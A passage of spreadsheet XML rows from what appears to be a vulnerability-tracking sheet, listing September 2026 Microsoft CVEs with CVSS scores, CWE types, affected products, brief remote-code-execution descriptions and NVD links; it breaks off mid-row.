    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70351</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft WebP Image Extension allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70351</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70586</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K19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0" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Paint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70586</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71328</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr">
        <is>
          <t>microsoft:.net, microsoft:visual_studio_2022, microsoft:visual_studio_2026, microsoft:windows</t>
        </is>
      </c>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71328</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71336</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K192" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71352</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows Remote Access Connection Manager allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71352</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72933</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft WDAC OLE DB provider for SQL allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72933</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72940</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Schannel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72940</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72950</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72950</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72959</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72959</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72960</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72960</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72972</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72972</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72973</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72973</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72986</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72986</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73006</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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2" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73006</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73012</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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3" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Management Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73012</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73013</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K20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4" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73013</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73016</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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5" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73016</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
